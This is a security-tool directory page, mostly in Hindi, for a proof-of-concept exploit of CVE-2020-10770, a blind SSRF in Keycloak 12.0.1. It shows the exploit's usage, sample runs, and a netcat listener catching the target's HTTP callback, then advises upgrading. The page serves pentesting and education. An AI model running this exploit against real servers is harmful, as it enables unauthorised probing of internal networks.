Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Keycloak-12.0.1-CVE-2020-10770 — Keycloak 12.0.1 - 'request_uri' ब्लाइंड सर्वर-साइड अनुरोध जालसाजी (SSRF) (अप्रमाणित) | Kitploit
उपकरण/GitHubGitHub/coldfusionx/keycloak-12.0.1-cve-2020-10770
टोहीभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubcoldfusionx/keycloak-12.0.1-cve-2020-10770

Keycloak-12.0.1-CVE-2020-10770

Keycloak 12.0.1 - 'request_uri' ब्लाइंड सर्वर-साइड अनुरोध जालसाजी (SSRF) (अप्रमाणित)

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
रिपॉजिटरी देखें
844 साल पहलेअभी तक समीक्षित नहीं

Keycloak-12.0.1-CVE-2020-10770

Keycloak 12.0.1 - 'request_uri ' ब्लाइंड सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) (अप्रमाणिकृत)

Exploit-DB-50405

अपेक्षित परिणाम: लोकलहोस्ट या आंतरिक रूप से सुलभ होस्ट का पोर्ट स्कैन।

केवल शैक्षिक और कॉर्पोरेट वातावरण में परीक्षण के लिए अभिप्रेत है।

यह एक्सप्लॉइट Python 3.8.6 पर परीक्षण किया गया था।

असुरक्षित अनुप्रयोग :

root@kitploit:~
docker run -p 9990:9990 -p 8080:8080 -e KEYCLOAK_USER=admin -e KEYCLOAK_PASSWORD=admin jboss/keycloak:12.0.1

उपयोग:

root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -h
usage: exploit.py [-h] [-u URL]

-=[Keycloak Blind SSRF test by ColdFusionX]=-

optional arguments:
  -h, --help         show this help message and exit
  -u URL, --url URL  Keycloak Target URL (Example: http://127.0.0.1:8080)

Exploit Usage :
./exploit.py -u http://127.0.0.1:8080
[^] Input Netcat host:port -> 192.168.0.1:4444

POC:

  • परिदृश्य 1: गैर-असुरक्षित लक्ष्य
root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:4444

[-] Invalid URL or Target not Vulnerable
  • परिदृश्य 2: असुरक्षित लक्ष्य
root@kitploit:~
cfx:  ~/keycloak
→ python3 exploit.py -u http://localhost:8080

[+] Keycloak Bind SSRF test by ColdFusionX

[^] Input Netcat host:port -> 192.168.0.1:9994

[+] BINGO! Check Netcat listener for HTTP callback :)

nc लिस्नर पर HTTP कॉलबैक:

root@kitploit:~
cfx:  ~/keycloak
→ nc -lvnp 9994
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::9994
Ncat: Listening on 0.0.0.0:9994
Ncat: Connection from 172.17.0.2.
Ncat: Connection from 172.17.0.2:36866.
GET / HTTP/1.1
Host: 192.168.0.1:9994
Connection: Keep-Alive
User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.9.1)
Accept-Encoding: gzip,deflate

समाधान

Keycloak 12.0.2 या उसके बाद के संस्करण में अपग्रेड करें।

संदर्भ

  • https://bugzilla.redhat.com/show_bug.cgi?id=1846270
  • https://nvd.nist.gov/vuln/detail/CVE-2020-10770
टूल डाउनलोड करें